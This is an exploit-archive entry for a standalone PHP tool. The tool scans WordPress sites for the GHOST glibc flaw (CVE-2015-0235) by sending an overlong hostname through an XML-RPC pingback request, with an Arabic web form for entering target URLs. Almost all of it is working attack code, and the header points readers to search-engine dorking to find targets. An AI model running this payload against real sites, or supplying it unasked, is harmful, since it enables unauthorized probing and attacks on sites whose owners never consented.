Share
## https://sploitus.com/exploit?id=PACKETSTORM:189622
=============================================================================================================================================
| # Title : WordPress 4.2.4 XMLRPC GHOST Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wordpress.org/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Standalone PHP code to scan WordPress for GHOST vulnerability using XML-RPC.
(linked: https://packetstorm.news/files/id/181060/ Linked CVE numbers: CVE-2015-0235),
[+] save code as poc.php.
[+] USage : http://127.0.0.1/poc.php
[+] PayLoad :
<?php
class WordpressGhostScanner {
private $target;
private $length;
public function __construct($target, $length = 2500) {
$this->target = $target;
$this->length = $length;
}
public function isWordpress() {
$headers = @get_headers($this->target);
if (!$headers) return false;
foreach ($headers as $header) {
if (stripos($header, 'X-Pingback') !== false) {
return true;
}
}
return false;
}
public function isXmlrpcEnabled() {
$url = $this->target . "/xmlrpc.php";
$response = @file_get_contents($url);
return $response !== false && stripos($response, 'XML-RPC server accepts') !== false;
}
public function checkVulnerability() {
if (!$this->isWordpress()) {
return "هذا الموقع لا يستخدم ووردبريس.";
}
if (!$this->isXmlrpcEnabled()) {
return "الواجهة XMLRPC غير مفعلة على هذا الموقع.";
}
$ghost = str_repeat("0", $this->length);
$payload = "http://{$ghost}/test.php";
$xml = "<?xml version='1.0'?><methodCall><methodName>pingback.ping</methodName><params><param><value>$payload</value></param><param><value>$payload</value></param></params></methodCall>";
$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => "Content-Type: text/xml\r\n",
'content' => $xml
]
]);
$response = @file_get_contents($this->target . '/xmlrpc.php', false, $context);
if ($response === false || strpos($http_response_header[0], '500') !== false) {
return "الموقع مستهدف بسبب ثغرة GHOST.";
} else {
return "الموقع غير معرض لثغرة GHOST.";
}
}
}
// واجهة المستخدم البسيطة
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$target = $_POST['target'];
$scanner = new WordpressGhostScanner($target);
$result = $scanner->checkVulnerability();
}
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<title>فحص ثغرة GHOST في ووردبريس</title>
</head>
<body>
<h2>أداة فحص ثغرة GHOST في ووردبريس</h2>
<form method="POST">
<label>أدخل رابط الموقع:</label>
<input type="text" name="target" required>
<button type="submit">فحص</button>
</form>
<?php if (isset($result)): ?>
<p><strong>النتيجة:</strong> <?php echo htmlspecialchars($result); ?></p>
<?php endif; ?>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================